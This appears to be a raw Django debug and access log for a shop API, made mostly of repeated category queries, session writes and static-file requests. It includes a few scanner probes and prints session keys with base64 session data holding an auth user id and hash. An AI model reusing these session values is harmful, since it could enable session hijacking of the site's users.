DEBUG 2019-12-07 07:50:02,784 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 07:50:02] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 07:54:54] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 07:55:44,725 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 07:55:44,729 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 07:55:44,731 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 07:55:44] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 08:00:02] "GET /whm-server-status HTTP/1.0" 301 0 [07/Dec/2019 08:00:02] "GET / HTTP/1.0" 302 0 [07/Dec/2019 08:05:05] "GET / HTTP/1.0" 302 0 [07/Dec/2019 08:11:15] "GET / HTTP/1.0" 302 0 [07/Dec/2019 08:21:10] "GET / HTTP/1.0" 302 0 [07/Dec/2019 08:26:13] "GET / HTTP/1.0" 302 0 [07/Dec/2019 08:32:36] "GET / HTTP/1.0" 302 0 [07/Dec/2019 08:37:39] "GET / HTTP/1.0" 302 0 [07/Dec/2019 08:42:42] "GET / HTTP/1.0" 302 0 [07/Dec/2019 08:51:24] "GET / HTTP/1.0" 302 0 [07/Dec/2019 08:57:47] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:05:01] "GET /whm-server-status HTTP/1.0" 301 0 [07/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:06:26] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:10:33] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:15:36] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:21:13] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:26:15] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:30:01] "GET /whm-server-status HTTP/1.0" 301 0 [07/Dec/2019 09:30:25] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:31:18] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:36:02] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2019-12-07 09:36:02,762 utils 32196 139885071562496 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '4b2pqbboim48d2c7rwc1201d6icjtacl' LIMIT 1; args=('4b2pqbboim48d2c7rwc1201d6icjtacl',) DEBUG 2019-12-07 09:36:02,765 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('4b2pqbboim48d2c7rwc1201d6icjtacl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T09:36:02.763274+00:00'::timestamptz); args=('4b2pqbboim48d2c7rwc1201d6icjtacl', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 9, 36, 2, 763274, tzinfo=)) [07/Dec/2019 09:36:02] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [07/Dec/2019 09:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:42:40] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:49:39] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:54:26] "GET /api/v1/categories HTTP/1.0" 301 0 [07/Dec/2019 09:54:42] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 09:55:58,812 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 09:55:58,819 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 09:55:58,823 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) Not Found: /robots.txt [07/Dec/2019 09:55:58] "GET /robots.txt HTTP/1.0" 404 6626 DEBUG 2019-12-07 09:55:58,894 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 09:55:58,897 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1000; args=() DEBUG 2019-12-07 09:55:58,917 utils 32196 139885071562496 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T09:55:58.911976+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 9, 55, 58, 911976, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 09:55:58,976 utils 32196 139885071562496 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T09:55:58.973019+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 9, 55, 58, 973019, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 09:55:58] "GET /api/v1/categories/ HTTP/1.0" 200 10258 [07/Dec/2019 09:55:59] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 200 3385 [07/Dec/2019 09:55:59] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 200 121457 [07/Dec/2019 09:55:59] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 200 817 [07/Dec/2019 09:55:59] "GET /static/rest_framework/css/default.css HTTP/1.0" 200 1131 [07/Dec/2019 09:55:59] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 200 88145 [07/Dec/2019 09:55:59] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 200 3597 [07/Dec/2019 09:55:59] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 200 1719 [07/Dec/2019 09:55:59] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 200 37608 [07/Dec/2019 09:55:59] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 200 13632 [07/Dec/2019 09:55:59] "GET /static/rest_framework/js/default.js HTTP/1.0" 200 1268 [07/Dec/2019 09:56:00] "GET /static/rest_framework/img/grid.png HTTP/1.0" 200 1458 Not Found: /favicon.ico [07/Dec/2019 09:56:01] "GET /favicon.ico HTTP/1.0" 404 6629 [07/Dec/2019 09:59:25] "OPTIONS /api/v1/categories HTTP/1.0" 301 0 [07/Dec/2019 09:59:44] "GET / HTTP/1.0" 302 0 [07/Dec/2019 09:59:48] "OPTIONS /api/v1/categories HTTP/1.0" 301 0 DEBUG 2019-12-07 10:06:51,976 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:06:51,981 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:06:51,983 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) DEBUG 2019-12-07 10:06:52,003 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:06:52,005 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC LIMIT 1000; args=() DEBUG 2019-12-07 10:06:52,015 utils 32196 139885071562496 (0.002) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T10:06:52.012872+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 10, 6, 52, 12872, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 10:06:52,049 utils 32196 139885071562496 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T10:06:52.047798+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 10, 6, 52, 47798, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 10:06:52] "GET /api/v1/categories/ HTTP/1.0" 200 10258 [07/Dec/2019 10:07:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 10:12:00,405 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:12:00,412 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:12:00,416 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:12:00] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 10:12:04,277 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:12:04,283 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:12:04,285 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:12:04] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 10:12:18] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 10:13:15,247 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:13:15,251 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:13:15,253 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:13:15] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 10:13:17,170 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:13:17,175 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:13:17,177 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:13:17] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 10:14:04,295 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:14:04,301 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:14:04,304 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:14:04] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 10:17:20] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 10:17:36,190 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:17:36,195 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:17:36,197 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:17:36] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 10:19:26,894 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:19:26,899 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:19:26,901 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:19:26] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 10:21:33] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 10:21:35,073 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ciws060y7t9f5tzvcxrmg5ffo98mtu1s' LIMIT 1; args=('ciws060y7t9f5tzvcxrmg5ffo98mtu1s',) DEBUG 2019-12-07 10:21:35,075 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ciws060y7t9f5tzvcxrmg5ffo98mtu1s', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T10:21:35.074277+00:00'::timestamptz); args=('ciws060y7t9f5tzvcxrmg5ffo98mtu1s', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 10, 21, 35, 74277, tzinfo=)) [07/Dec/2019 10:21:35] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 10:22:23] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 10:26:17,916 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:26:17,922 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:26:17,924 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:26:17] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 10:29:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 10:36:10,973 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:36:10,983 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:36:10,988 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:36:10] "GET /api/v1/categories/ HTTP/1.0" 200 178 [07/Dec/2019 10:37:37] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 10:38:50,823 utils 32196 139885071562496 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:38:50,830 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 10:38:50,834 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 2 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(2,) [07/Dec/2019 10:38:50] "GET /api/v1/categories/ HTTP/1.0" 200 178 DEBUG 2019-12-07 10:38:51,139 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 10:38:51,143 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 